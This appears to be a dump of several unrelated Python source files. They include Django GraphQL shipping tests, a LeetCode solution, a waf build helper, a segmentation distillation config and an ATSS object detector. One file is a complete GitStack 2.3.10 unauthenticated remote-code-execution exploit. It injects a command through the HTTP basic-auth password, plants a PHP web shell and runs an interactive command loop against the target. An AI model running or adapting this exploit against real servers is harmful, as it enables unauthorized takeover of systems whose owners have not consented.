@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_vouchers_query_with_channel_slug(
staff_api_client,
shipping_zones,
channel_USD,
permission_manage_shipping,
count_queries,
):
variables = {"channel": channel_USD.slug}
get_graphql_content(
staff_api_client.post_graphql(
SHIPPING_METHODS_QUERY,
variables,
permissions=[permission_manage_shipping],
check_no_permissions=False,
)
)
@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_vouchers_query_without_channel_slug(
staff_api_client,
shipping_zones,
permission_manage_shipping,
count_queries,
):
get_graphql_content(
staff_api_client.post_graphql(
SHIPPING_METHODS_QUERY,
{},
permissions=[permission_manage_shipping],
check_no_permissions=False,
)
)
EXCLUDE_PRODUCTS_MUTATION = """
mutation shippingPriceRemoveProductFromExclude(
$id: ID!, $input:ShippingPriceExcludeProductsInput!
) {
shippingPriceExcludeProducts(
id: $id
input: $input) {
errors {
field
code
}
shippingMethod {
id
excludedProducts(first:10){
totalCount
edges{
node{
id
}
}
}
}
}
}
"""
@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_exclude_products_for_shipping_method(
shipping_method,
published_collection,
product_list_published,
product_list,
categories_tree_with_published_products,
collection,
staff_api_client,
permission_manage_shipping,
):
# product_list has products with slugs slug:test-product-a, slug:test-product-b,
# slug:test-product-c
product_db_ids = [p.pk for p in product_list]
product_ids = [graphene.Node.to_global_id("Product", p) for p in product_db_ids]
expected_product_ids = [
graphene.Node.to_global_id("Product", p.pk) for p in product_list
]
shipping_method_id = graphene.Node.to_global_id(
"ShippingMethod", shipping_method.pk
)
variables = {
"id": shipping_method_id,
"input": {"products": product_ids},
}
response = staff_api_client.post_graphql(
EXCLUDE_PRODUCTS_MUTATION, variables, permissions=[permission_manage_shipping]
)
content = get_graphql_content(response)
shipping_method = content["data"]["shippingPriceExcludeProducts"]["shippingMethod"]
excluded_products = shipping_method["excludedProducts"]
total_count = excluded_products["totalCount"]
excluded_product_ids = {p["node"]["id"] for p in excluded_products["edges"]}
assert len(expected_product_ids) == total_count == 3
assert excluded_product_ids == set(expected_product_ids)
@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_exclude_products_for_shipping_method_already_has_excluded_products(
shipping_method,
product_list,
product,
staff_api_client,
permission_manage_shipping,
):
shipping_method_id = graphene.Node.to_global_id(
"ShippingMethod", shipping_method.pk
)
shipping_method.excluded_products.add(product, product_list[0])
product_ids = [graphene.Node.to_global_id("Product", p.pk) for p in product_list]
variables = {"id": shipping_method_id, "input": {"products": product_ids}}
response = staff_api_client.post_graphql(
EXCLUDE_PRODUCTS_MUTATION, variables, permissions=[permission_manage_shipping]
)
content = get_graphql_content(response)
shipping_method = content["data"]["shippingPriceExcludeProducts"]["shippingMethod"]
excluded_products = shipping_method["excludedProducts"]
total_count = excluded_products["totalCount"]
expected_product_ids = product_ids
expected_product_ids.append(graphene.Node.to_global_id("Product", product.pk))
excluded_product_ids = {p["node"]["id"] for p in excluded_products["edges"]}
assert len(expected_product_ids) == total_count
assert excluded_product_ids == set(expected_product_ids)
REMOVE_PRODUCTS_FROM_EXCLUDED_PRODUCTS_MUTATION = """
mutation shippingPriceRemoveProductFromExclude(
$id: ID!, $products: [ID]!
) {
shippingPriceRemoveProductFromExclude(
id: $id
products: $products) {
errors {
field
code
}
shippingMethod {
id
excludedProducts(first:10){
totalCount
edges{
node{
id
}
}
}
}
}
}
"""
@pytest.mark.django_db
@pytest.mark.count_queries(autouse=False)
def test_remove_products_from_excluded_products_for_shipping_method(
shipping_method,
product_list,
staff_api_client,
permission_manage_shipping,
product,
):
shipping_method_id = graphene.Node.to_global_id(
"ShippingMethod", shipping_method.pk
)
shipping_method.excluded_products.set(product_list)
shipping_method.excluded_products.add(product)
product_ids = [
graphene.Node.to_global_id("Product", product.pk),
]
variables = {"id": shipping_method_id, "products": product_ids}
response = staff_api_client.post_graphql(
REMOVE_PRODUCTS_FROM_EXCLUDED_PRODUCTS_MUTATION,
variables,
permissions=[permission_manage_shipping],
)
content = get_graphql_content(response)
shipping_method = content["data"]["shippingPriceRemoveProductFromExclude"][
"shippingMethod"
]
excluded_products = shipping_method["excludedProducts"]
total_count = excluded_products["totalCount"]
expected_product_ids = {
graphene.Node.to_global_id("Product", p.pk) for p in product_list
}
excluded_product_ids = {p["node"]["id"] for p in excluded_products["edges"]}
assert total_count == len(expected_product_ids)
assert excluded_product_ids == expected_product_ids
|
py | b40024c5f241c7e69172772cf540bc04f6be7edb | from typing import List
class Solution:
def maxCoins(self, nums: List[int]) -> int:
nums = [1] + [num for num in nums if num > 0] + [1]
n = len(nums)
m = {}
def dfs(left, right):
if left + 1 == right: return 0
if (left, right) in m: return m[(left, right)]
result = 0
for i in range(left + 1, right):
sub1 = dfs(left, i)
sub2 = dfs(i, right)
cur = nums[left] * nums[i] * nums[right] + sub1 + sub2
result = max(result, cur)
m[(left, right)] = result
return result
return dfs(0, n - 1)
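# The solution is an interval DP over the padded array [1] + nums + [1]:
# dfs(left, right) is the best score for bursting every balloon strictly
# between left and right, trying each i in between as the last balloon burst
# (worth nums[left] * nums[i] * nums[right]). With memoization the overall
# complexity is O(n^3). For the sample input [3, 1, 5, 8] below, the
# expected output is 167.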
nums = [3, 1, 5, 8]
s = Solution()
result = s.maxCoins(nums)
print(result)
|
py | b40024f538309982ee7f035ff998bb95b4169409 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
from waflib import Utils
from waflib.Configure import conf
@conf
def d_platform_flags(self):
v=self.env
if not v.DEST_OS:
v.DEST_OS=Utils.unversioned_sys_platform()
binfmt=Utils.destos_to_binfmt(self.env.DEST_OS)
if binfmt=='pe':
v['dprogram_PATTERN']='%s.exe'
v['dshlib_PATTERN']='lib%s.dll'
v['dstlib_PATTERN']='lib%s.a'
elif binfmt=='mac-o':
v['dprogram_PATTERN']='%s'
v['dshlib_PATTERN']='lib%s.dylib'
v['dstlib_PATTERN']='lib%s.a'
else:
v['dprogram_PATTERN']='%s'
v['dshlib_PATTERN']='lib%s.so'
v['dstlib_PATTERN']='lib%s.a'
DLIB='''
version(D_Version2) {
import std.stdio;
int main() {
writefln("phobos2");
return 0;
}
} else {
version(Tango) {
import tango.stdc.stdio;
int main() {
printf("tango");
return 0;
}
} else {
import std.stdio;
int main() {
writefln("phobos1");
return 0;
}
}
}
'''
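# The DLIB fragment above prints which D runtime library is in use
# ("phobos2", "tango" or "phobos1"); check_dlibrary() below compiles and runs
# it and stores the trimmed output in conf.env.DLIBRARY.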
@conf
def check_dlibrary(self,execute=True):
ret=self.check_cc(features='d dprogram',fragment=DLIB,compile_filename='test.d',execute=execute,define_ret=True)
if execute:
self.env.DLIBRARY=ret.strip()
|
py | b40025066d6b1a4d6a346fd2e66555b970fbf4dc | #!/usr/bin/python3
# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
# Date: 18.01.2018
# Software Link: https://gitstack.com/
# Category: remote
#
#1. Description
#
#$_SERVER['PHP_AUTH_PW'] is directly passed to exec function.
#
#https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html
import requests
from requests.auth import HTTPBasicAuth
import os
import sys
import argparse
def arguments():
parser = argparse.ArgumentParser(description="Create command console on vulnerable GitStack installations")
parser.add_argument("--host", dest="host", required=True, help="Host to send the exploit to.")
parser.add_argument("--port", dest="port", default=-1, help="Port to use. Default 80/443", type=int)
parser.add_argument("--uri", dest="uri", default="/", help="URI where gitstack lives. Default \"/\"")
parser.add_argument("--ssl", dest="ssl", default="False", help="Use HTTPS? Default False", choices=["True","False"])
parser.add_argument("--filename", dest="filename", default="exploit.php", help="Name and path for the exploit php script on the target machine. Default: exploit.php")
parser.add_argument("--filepath", dest="filepath", default="C:/GitStack/gitphp/", help="Absolute path for the exploit file to end up on. Default: C:/GitStack/gitphp/")
args = parser.parse_args()
args.ssl = (args.ssl.upper() == "TRUE")
if args.port <= 0:
if args.ssl:
args.port = 443
else:
args.port = 80
elif args.port > 65535:
print(f"[-] Invalid port: {args.port}")
exit(-1)
return args
def main():
# 1 - Set up the target for the exploit
# 1.1 - Craft valid URL for command injection so the server doesn't complain
# 1.1.1 - Find or create a user
# 1.1.2 - Find or create a repository
# 1.1.3 - Add user to the repository
# 1.2 - inject PHP script by using a command allowing us to pass commands to the server via request parameter
# 2. - launch a shell that repeatedly sends commands to that php script
args = arguments()
host = args.host
port = args.port
uri = args.uri
ssl = args.ssl
filename = args.filename
filepath = args.filepath
proto = "http://"
if ssl:
proto = "https://"
target = f'{proto}{host}:{port}{uri}'
exploit(target, filename, filepath)
def exploit(target, filename, filepath):
repository = "rce"
username = "rce"
password = "rce"
csrf_token = "token"
user_list = []
print("[+] Get user list")
try:
r = requests.get(f"{target}rest/user/")
user_list = r.json()
user_list.remove('everyone')
print(user_list)
except:
pass
# create or find user we can upload the exploit as
if len(user_list) > 0:
username = user_list[0]
print("[+] Found user {}".format(username))
else:
print("[+] Didn't find user we can use, create one.")
print(f"[+] Create user {username}")
r = requests.post(f"{target}rest/user/", data={"username" : username, "password" : password})
if not "User created" in r.text and not "User already exist" in r.text:
print("[-] Cannot create user")
exit(-1)
# enable web interface
print("[+] Checking if web interface is up.")
r = requests.get(f"{target}rest/settings/general/webinterface/")
if "true" in r.text:
print("[+] Web repository already enabled")
else:
print("[+] Enable web repository")
r = requests.put(f"{target}rest/settings/general/webinterface/", data="{\"enabled\" : \"true\"}")
if not "Web interface successfully enabled" in r.text:
print("[-] Cannot enable web interface")
exit(-1)
# find or create a repository we can use for a valid URI
print("[+] Get repositories list")
r = requests.get(f"{target}rest/repository/")
repository_list = r.json()
print(repository_list)
if len(repository_list) > 0:
repository = repository_list[0]["name"]
print("[+] Found repository {}".format(repository))
else:
print("[+] Did not find a repository we can use")
print(f"[+] Create repository {repository}")
r = requests.post(f"{target}rest/repository/", cookies={"csrftoken" : csrf_token}, data={"name" : repository, "csrfmiddlewaretoken" : csrf_token})
if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
print("[-] Cannot create repository")
exit(-1)
# add found/created user to the found/created repository
print("[+] Add user to repository")
r = requests.post(f"{target}rest/repository/{repository}/user/{username}/")
if not "added to" in r.text and not "has already" in r.text:
print("[-] Cannot add user to repository")
exit(-1)
print("[+] Disable access for anyone")
r = requests.delete(f"{target}rest/repository/{repository}/user/everyone/")
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
print("[-] Cannot remove access for anyone")
exit(-1)
print("[+] Create backdoor in PHP")
# default exploit, execute command
    # inject a command that writes the backdoor into a file, using the valid URL we crafted from the discovered user and repository
exploit = "<?php system($_POST['a']); ?>"
print(f"[+] Injecting PHP shell file with name {filename}")
r = requests.get(f"{target}web/index.php?p={repository}.git&a=summary", auth=HTTPBasicAuth(username, f"p && echo \"{exploit}\" > {filepath}\{filename}"))
print(r.text.encode(sys.stdout.encoding, errors="replace"))
print("[+] Starting command prompt")
print("Beware that commands that run their own session will not work. You can't lauch powershell and use it from here.")
print("Only use this as a stager and run commands that terminate!")
print("Type exit to quit.")
while True:
command = input("Command:> ")
if command.upper() == "EXIT":
exit(0)
r = requests.post(f"{target}/web/{filename}", data={"a" : command})
print(r.text.encode(sys.stdout.encoding, errors="replace").decode("ascii"))
if __name__ == "__main__":
main() |
py | b40025334aac076c23b1116c853083fc1fbaee27 | _base_ = [
'../_base_/datasets/ade20k_repeat.py',
'../_base_/default_runtime.py',
'../_base_/schedules/schedule_160k_adamw.py'
]
norm_cfg = dict(type='SyncBN', requires_grad=True)
model = dict(
type='SDModule',
cfg_s=dict(
type='EncoderDecoder',
pretrained='pretrained/mit_b0.pth',
backbone=dict(
type='mit_b0',
style='pytorch'),
decode_head=dict(
type='SegFormerHead',
in_channels=[32, 64, 160, 256],
in_index=[0, 1, 2, 3],
feature_strides=[4, 8, 16, 32],
channels=128,
dropout_ratio=0.1,
num_classes=150,
norm_cfg=norm_cfg,
align_corners=False,
decoder_params=dict(embed_dim=256),
loss_decode=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
),
cfg_t=dict(
type='EncoderDecoder',
backbone=dict(
type='mit_b4',
style='pytorch'),
decode_head=dict(
type='SegFormerHead',
in_channels=[64, 128, 320, 512],
in_index=[0, 1, 2, 3],
feature_strides=[4, 8, 16, 32],
channels=128,
dropout_ratio=0.1,
num_classes=150,
norm_cfg=norm_cfg,
align_corners=False,
decoder_params=dict(embed_dim=768),
loss_decode=dict(type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0))
),
distillation = [
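        # Two logit-level KD terms are configured below: a channel-grouped KLD
        # (group_size 15) and a patch-wise spatial KLD (64x64 kernel, stride 32),
        # both bilinearly resized to match; 'earlystop_config': 112000 presumably
        # stops each term after 112k iterations (an assumption based on the key name).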
{'student_layer':'decode_head.linear_pred',
'teacher_layer':'decode_head.linear_pred',
'loss_name':'KLDLoss',
'loss_config':{
'weight':1,
'tau':1,
'reshape_config':'logits',
'resize_config':{'mode':'bilinear','align_corners':False},
'mask_config':False,
'transform_config':{'loss_type':'channel','group_size':15},
'ff_config':False,
'earlystop_config':112000,
},
},
{'student_layer':'decode_head.linear_pred',
'teacher_layer':'decode_head.linear_pred',
'loss_name':'KLDLoss',
'loss_config':{
'weight':1,
'tau':1,
'reshape_config':'logits',
'resize_config':{'mode':'bilinear','align_corners':False},
'mask_config':False,
'transform_config':{'loss_type':'spatial','kernel_size':64,'stride':32},
'ff_config':False,
'earlystop_config':112000,
},
},
],
    s_pretrain = './pretrained/mit_b0.pth',  # student's pretrained weights
    t_pretrain = './pretrained/segformer.b4.512x512.ade.160k.pth',  # teacher's pretrained weights
train_cfg=dict(),
test_cfg=dict(mode='whole'),
)
optimizer = dict(_delete_=True, type='AdamW', lr=0.00006, betas=(0.9,0.999), weight_decay=0.01,
paramwise_cfg=dict(custom_keys={'pos_block': dict(decay_mult=0.),
'norm': dict(decay_mult=0.),
'head': dict(lr_mult=10.)
}))
lr_config = dict(_delete_=True, policy='poly',
warmup='linear',
warmup_iters=1500,
warmup_ratio=1e-6,
power=1.0, min_lr=0.0, by_epoch=False)
work_dir = '/apdcephfs/private_inchzhang/shared_info/10.16/cg15+sg64'
data = dict(samples_per_gpu=2)
evaluation = dict(interval=16000, metric='mIoU')
# resume_from = ''
|
py | b40025f228b719a8a4a96323f417d009836fcade | # Program no 3
from datetime import datetime
# datetime object containing current date and time
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
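# With the format above, the output looks like (illustrative values):
# date and time = 18/01/2021 14:03:52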
print("date and time =", dt_string) |
py | b400277863dde2d6b240cefe9cd12dcff21ed3bb | # -----------------------------------------------------------------------------
# Copyright (c) 2009-2016 Nicolas P. Rougier. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
from . panzoom import PanZoom
from . viewport import Viewport
from . arcball import Arcball
from . trackball import Trackball
from . trackball_pan import TrackballPan
from . xyz import X,Y,Z
from . rotate import Rotate
from . position import Position
from . geoposition import GeoPosition
from . translate import Translate
from . transform import Transform
from .albers import Albers
from .polar import PolarProjection
from .hammer import HammerProjection
from .identity import IdentityProjection
from .conic_equal_area import ConicEqualArea
from .transverse_mercator import TransverseMercatorProjection
from .azimuthal_equal_area import AzimuthalEqualAreaProjection
from .azimuthal_equidistant import AzimuthalEquidistantProjection
from .pvm_projection import PVMProjection
# from perpective_projection import PerspectiveProjection
from .orthographic_projection import OrthographicProjection
from . quantitative_scale import QuantitativeScale
from . log_scale import LogScale
from . power_scale import PowerScale
from . linear_scale import LinearScale
|
py | b40028906f6f26b6b3b218dc8391f421d17c1e80 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (C) 2019-2021 Megvii Inc. All rights reserved.
import torch
import torch.nn.functional as F
from torch import nn
from cvpods.layers import ShapeSpec, cat, generalized_batched_nms
from cvpods.modeling.box_regression import Shift2BoxTransform
from cvpods.modeling.losses import iou_loss, sigmoid_focal_loss_jit
from cvpods.modeling.meta_arch.fcos import FCOSHead, permute_all_cls_and_box_to_N_HWA_K_and_concat
from cvpods.modeling.meta_arch.retinanet import permute_to_N_HWA_K
from cvpods.modeling.postprocessing import detector_postprocess
from cvpods.structures import Boxes, ImageList, Instances, pairwise_iou
from cvpods.utils import comm, log_first_n
class ATSS(nn.Module):
"""
Implement ATSS (https://arxiv.org/abs/1912.02424).
"""
def __init__(self, cfg):
super().__init__()
self.device = torch.device(cfg.MODEL.DEVICE)
# fmt: off
self.num_classes = cfg.MODEL.FCOS.NUM_CLASSES
self.in_features = cfg.MODEL.FCOS.IN_FEATURES
self.fpn_strides = cfg.MODEL.FCOS.FPN_STRIDES
# Loss parameters:
self.focal_loss_alpha = cfg.MODEL.FCOS.FOCAL_LOSS_ALPHA
self.focal_loss_gamma = cfg.MODEL.FCOS.FOCAL_LOSS_GAMMA
self.iou_loss_type = cfg.MODEL.FCOS.IOU_LOSS_TYPE
self.reg_weight = cfg.MODEL.FCOS.REG_WEIGHT
# Inference parameters:
self.score_threshold = cfg.MODEL.FCOS.SCORE_THRESH_TEST
self.topk_candidates = cfg.MODEL.FCOS.TOPK_CANDIDATES_TEST
self.nms_threshold = cfg.MODEL.FCOS.NMS_THRESH_TEST
self.nms_type = cfg.MODEL.NMS_TYPE
self.max_detections_per_image = cfg.TEST.DETECTIONS_PER_IMAGE
# fmt: on
self.backbone = cfg.build_backbone(
cfg, input_shape=ShapeSpec(channels=len(cfg.MODEL.PIXEL_MEAN)))
backbone_shape = self.backbone.output_shape()
feature_shapes = [backbone_shape[f] for f in self.in_features]
self.head = FCOSHead(cfg, feature_shapes)
self.shift_generator = cfg.build_shift_generator(cfg, feature_shapes)
# Matching and loss
self.shift2box_transform = Shift2BoxTransform(
weights=cfg.MODEL.FCOS.BBOX_REG_WEIGHTS)
self.anchor_scale = cfg.MODEL.ATSS.ANCHOR_SCALE
self.atss_topk = cfg.MODEL.ATSS.TOPK
pixel_mean = torch.Tensor(cfg.MODEL.PIXEL_MEAN).to(self.device).view(
3, 1, 1)
pixel_std = torch.Tensor(cfg.MODEL.PIXEL_STD).to(self.device).view(
3, 1, 1)
self.normalizer = lambda x: (x - pixel_mean) / pixel_std
self.to(self.device)
def forward(self, batched_inputs):
"""
Args:
batched_inputs: a list, batched outputs of :class:`DatasetMapper` .
Each item in the list contains the inputs for one image.
For now, each item in the list is a dict that contains:
* image: Tensor, image in (C, H, W) format.
* instances: Instances
Other information that's included in the original dicts, such as:
* "height", "width" (int): the output resolution of the model, used in inference.
See :meth:`postprocess` for details.
Returns:
dict[str: Tensor]:
mapping from a named loss to a tensor storing the loss. Used during training only.
"""
images = self.preprocess_image(batched_inputs)
if "instances" in batched_inputs[0]:
gt_instances = [
x["instances"].to(self.device) for x in batched_inputs
]
elif "targets" in batched_inputs[0]:
log_first_n(
"WARNING",
"'targets' in the model inputs is now renamed to 'instances'!",
n=10)
gt_instances = [
x["targets"].to(self.device) for x in batched_inputs
]
else:
gt_instances = None
features = self.backbone(images.tensor)
features = [features[f] for f in self.in_features]
box_cls, box_delta, box_center = self.head(features)
shifts = self.shift_generator(features)
if self.training:
gt_classes, gt_shifts_reg_deltas, gt_centerness = self.get_ground_truth(
shifts, gt_instances)
return self.losses(gt_classes, gt_shifts_reg_deltas, gt_centerness,
box_cls, box_delta, box_center)
else:
results = self.inference(box_cls, box_delta, box_center, shifts,
images)
processed_results = []
for results_per_image, input_per_image, image_size in zip(
results, batched_inputs, images.image_sizes):
height = input_per_image.get("height", image_size[0])
width = input_per_image.get("width", image_size[1])
r = detector_postprocess(results_per_image, height, width)
processed_results.append({"instances": r})
return processed_results
def losses(self, gt_classes, gt_shifts_deltas, gt_centerness,
pred_class_logits, pred_shift_deltas, pred_centerness):
"""
Args:
For `gt_classes`, `gt_shifts_deltas` and `gt_centerness` parameters, see
:meth:`FCOS.get_ground_truth`.
Their shapes are (N, R) and (N, R, 4), respectively, where R is
the total number of shifts across levels, i.e. sum(Hi x Wi)
For `pred_class_logits`, `pred_shift_deltas` and `pred_centerness`, see
:meth:`FCOSHead.forward`.
Returns:
dict[str: Tensor]:
mapping from a named loss to a scalar tensor
storing the loss. Used during training only. The dict keys are:
"loss_cls" and "loss_box_reg"
"""
pred_class_logits, pred_shift_deltas, pred_centerness = \
permute_all_cls_and_box_to_N_HWA_K_and_concat(
pred_class_logits, pred_shift_deltas, pred_centerness,
self.num_classes
) # Shapes: (N x R, K) and (N x R, 4), respectively.
gt_classes = gt_classes.flatten()
gt_shifts_deltas = gt_shifts_deltas.view(-1, 4)
gt_centerness = gt_centerness.view(-1, 1)
valid_idxs = gt_classes >= 0
foreground_idxs = (gt_classes >= 0) & (gt_classes != self.num_classes)
num_foreground = foreground_idxs.sum()
gt_classes_target = torch.zeros_like(pred_class_logits)
gt_classes_target[foreground_idxs, gt_classes[foreground_idxs]] = 1
num_foreground = comm.all_reduce(num_foreground) / float(comm.get_world_size())
num_foreground_centerness = gt_centerness[foreground_idxs].sum()
num_targets = comm.all_reduce(num_foreground_centerness) / float(comm.get_world_size())
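        # The regression loss below is normalized by num_targets, i.e. the
        # summed centerness of the foreground positions averaged across
        # workers, rather than by the plain foreground count.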
# logits loss
loss_cls = sigmoid_focal_loss_jit(
pred_class_logits[valid_idxs],
gt_classes_target[valid_idxs],
alpha=self.focal_loss_alpha,
gamma=self.focal_loss_gamma,
reduction="sum",
) / max(1.0, num_foreground)
# regression loss
loss_box_reg = iou_loss(
pred_shift_deltas[foreground_idxs],
gt_shifts_deltas[foreground_idxs],
gt_centerness[foreground_idxs],
box_mode="ltrb",
loss_type=self.iou_loss_type,
reduction="sum",
) / max(1.0, num_targets) * self.reg_weight
# ) / max(1.0, num_foreground) * self.reg_weight
# centerness loss
loss_centerness = F.binary_cross_entropy_with_logits(
pred_centerness[foreground_idxs],
gt_centerness[foreground_idxs],
reduction="sum",
) / max(1, num_foreground)
return {
"loss_cls": loss_cls,
"loss_box_reg": loss_box_reg,
"loss_centerness": loss_centerness
}
@torch.no_grad()
def get_ground_truth(self, shifts, targets):
"""
Args:
shifts (list[list[Tensor]]): a list of N=#image elements. Each is a
list of #feature level tensors. The tensors contains shifts of
this image on the specific feature level.
targets (list[Instances]): a list of N `Instances`s. The i-th
`Instances` contains the ground-truth per-instance annotations
for the i-th input image. Specify `targets` during training only.
Returns:
gt_classes (Tensor):
An integer tensor of shape (N, R) storing ground-truth
labels for each shift.
R is the total number of shifts, i.e. the sum of Hi x Wi for all levels.
Shifts in the valid boxes are assigned their corresponding label in the
[0, K-1] range. Shifts in the background are assigned the label "K".
Shifts in the ignore areas are assigned a label "-1", i.e. ignore.
gt_shifts_deltas (Tensor):
Shape (N, R, 4).
The last dimension represents ground-truth shift2box transform
targets (dl, dt, dr, db) that map each shift to its matched ground-truth box.
The values in the tensor are meaningful only when the corresponding
shift is labeled as foreground.
gt_centerness (Tensor):
                A float tensor of shape (N, R) whose values lie in [0, 1],
                storing the ground-truth centerness for each shift.
"""
gt_classes = []
gt_shifts_deltas = []
gt_centerness = []
for shifts_per_image, targets_per_image in zip(shifts, targets):
shifts_over_all_feature_maps = torch.cat(shifts_per_image, dim=0)
gt_boxes = targets_per_image.gt_boxes
is_in_boxes = self.shift2box_transform.get_deltas(
shifts_over_all_feature_maps, gt_boxes.tensor.unsqueeze(1)
).min(dim=-1).values > 0
gt_positions_iou = []
candidate_idxs = []
base = 0
for stride, shifts_i in zip(self.fpn_strides, shifts_per_image):
gt_positions_iou.append(pairwise_iou(
gt_boxes,
Boxes(torch.cat((
shifts_i - stride * self.anchor_scale / 2,
shifts_i + stride * self.anchor_scale / 2,
), dim=1))
))
distances = (
gt_boxes.get_centers().unsqueeze(1) - shifts_i
).pow_(2).sum(dim=-1).sqrt_()
_, topk_idxs = distances.topk(
self.atss_topk, dim=1, largest=False)
candidate_idxs.append(base + topk_idxs)
base += len(shifts_i)
gt_positions_iou = torch.cat(gt_positions_iou, dim=1)
candidate_idxs = torch.cat(candidate_idxs, dim=1)
candidate_ious = gt_positions_iou.gather(1, candidate_idxs)
ious_thr = (candidate_ious.mean(dim=1, keepdim=True)
+ candidate_ious.std(dim=1, keepdim=True))
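            # ATSS adaptive threshold: for each gt box the IoU threshold is the
            # mean plus the standard deviation of its candidates' IoUs; only
            # candidates above this threshold whose centers lie inside the gt
            # box are kept as positives.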
is_foreground = torch.zeros_like(
is_in_boxes).scatter_(1, candidate_idxs, True)
is_foreground &= gt_positions_iou >= ious_thr
gt_positions_iou[~is_in_boxes] = -1
gt_positions_iou[~is_foreground] = -1
# if there are still more than one objects for a position,
# we choose the one with maximum iou
positions_max_iou, gt_matched_idxs = gt_positions_iou.max(dim=0)
# ground truth box regression
gt_shifts_reg_deltas_i = self.shift2box_transform.get_deltas(
shifts_over_all_feature_maps, gt_boxes[gt_matched_idxs].tensor)
# ground truth classes
has_gt = len(targets_per_image) > 0
if has_gt:
gt_classes_i = targets_per_image.gt_classes[gt_matched_idxs]
# Shifts with iou -1 are treated as background.
gt_classes_i[positions_max_iou == -1] = self.num_classes
else:
gt_classes_i = torch.zeros_like(
gt_matched_idxs) + self.num_classes
# ground truth centerness
left_right = gt_shifts_reg_deltas_i[:, [0, 2]]
top_bottom = gt_shifts_reg_deltas_i[:, [1, 3]]
gt_centerness_i = torch.sqrt(
(left_right.min(dim=-1).values / left_right.max(dim=-1).values).clamp_(min=0)
* (top_bottom.min(dim=-1).values / top_bottom.max(dim=-1).values).clamp_(min=0)
)
gt_classes.append(gt_classes_i)
gt_shifts_deltas.append(gt_shifts_reg_deltas_i)
gt_centerness.append(gt_centerness_i)
return torch.stack(gt_classes), torch.stack(
gt_shifts_deltas), torch.stack(gt_centerness)
def inference(self, box_cls, box_delta, box_center, shifts, images):
"""
Arguments:
box_cls, box_delta, box_center: Same as the output of :meth:`FCOSHead.forward`
shifts (list[list[Tensor]): a list of #images elements. Each is a
list of #feature level tensor. The tensor contain shifts of this
image on the specific feature level.
images (ImageList): the input images
Returns:
results (List[Instances]): a list of #images elements.
"""
assert len(shifts) == len(images)
results = []
box_cls = [permute_to_N_HWA_K(x, self.num_classes) for x in box_cls]
box_delta = [permute_to_N_HWA_K(x, 4) for x in box_delta]
box_center = [permute_to_N_HWA_K(x, 1) for x in box_center]
# list[Tensor], one per level, each has shape (N, Hi x Wi, K or 4)
for img_idx, shifts_per_image in enumerate(shifts):
image_size = images.image_sizes[img_idx]
box_cls_per_image = [
box_cls_per_level[img_idx] for box_cls_per_level in box_cls
]
box_reg_per_image = [
box_reg_per_level[img_idx] for box_reg_per_level in box_delta
]
box_ctr_per_image = [
box_ctr_per_level[img_idx] for box_ctr_per_level in box_center
]
results_per_image = self.inference_single_image(
box_cls_per_image, box_reg_per_image, box_ctr_per_image,
shifts_per_image, tuple(image_size))
results.append(results_per_image)
return results
def inference_single_image(self, box_cls, box_delta, box_center, shifts,
image_size):
"""
Single-image inference. Return bounding-box detection results by thresholding
on scores and applying non-maximum suppression (NMS).
Arguments:
box_cls (list[Tensor]): list of #feature levels. Each entry contains
tensor of size (H x W, K)
box_delta (list[Tensor]): Same shape as 'box_cls' except that K becomes 4.
box_center (list[Tensor]): Same shape as 'box_cls' except that K becomes 1.
shifts (list[Tensor]): list of #feature levels. Each entry contains
a tensor, which contains all the shifts for that
image in that feature level.
image_size (tuple(H, W)): a tuple of the image height and width.
Returns:
Same as `inference`, but for only one image.
"""
boxes_all = []
scores_all = []
class_idxs_all = []
# Iterate over every feature level
for box_cls_i, box_reg_i, box_ctr_i, shifts_i in zip(
box_cls, box_delta, box_center, shifts):
# (HxWxK,)
box_cls_i = box_cls_i.flatten().sigmoid_()
# Keep top k top scoring indices only.
num_topk = min(self.topk_candidates, box_reg_i.size(0))
# torch.sort is actually faster than .topk (at least on GPUs)
predicted_prob, topk_idxs = box_cls_i.sort(descending=True)
predicted_prob = predicted_prob[:num_topk]
topk_idxs = topk_idxs[:num_topk]
# filter out the proposals with low confidence score
keep_idxs = predicted_prob > self.score_threshold
predicted_prob = predicted_prob[keep_idxs]
topk_idxs = topk_idxs[keep_idxs]
shift_idxs = topk_idxs // self.num_classes
classes_idxs = topk_idxs % self.num_classes
box_reg_i = box_reg_i[shift_idxs]
shifts_i = shifts_i[shift_idxs]
# predict boxes
predicted_boxes = self.shift2box_transform.apply_deltas(
box_reg_i, shifts_i)
box_ctr_i = box_ctr_i.flatten().sigmoid_()[shift_idxs]
predicted_prob = torch.sqrt(predicted_prob * box_ctr_i)
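            # final score is the geometric mean of the classification score
            # and the predicted centerness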
boxes_all.append(predicted_boxes)
scores_all.append(predicted_prob)
class_idxs_all.append(classes_idxs)
boxes_all, scores_all, class_idxs_all = [
cat(x) for x in [boxes_all, scores_all, class_idxs_all]
]
keep = generalized_batched_nms(
boxes_all, scores_all, class_idxs_all,
self.nms_threshold, nms_type=self.nms_type
)
keep = keep[:self.max_detections_per_image]
result = Instances(image_size)
result.pred_boxes = Boxes(boxes_all[keep])
result.scores = scores_all[keep]
result.pred_classes = class_idxs_all[keep]
return result
def preprocess_image(self, batched_inputs):
"""
Normalize, pad and batch the input images.
"""
images = [x["image"].to(self.device) for x in batched_inputs]
images = [self.normalizer(x) for x in images]
images = ImageList.from_tensors(images,
self.backbone.size_divisibility)
return images
def _inference_for_ms_test(self, batched_inputs):
"""
function used for multiscale test, will be refactor in the future.
The same input with `forward` function.
"""
assert not self.training, "inference mode with training=True"
assert len(batched_inputs) == 1, "inference image number > 1"
images = self.preprocess_image(batched_inputs)
features = self.backbone(images.tensor)
features = [features[f] for f in self.in_features]
box_cls, box_delta, box_center = self.head(features)
shifts = self.shift_generator(features)
results = self.inference(box_cls, box_delta, box_center, shifts, images)
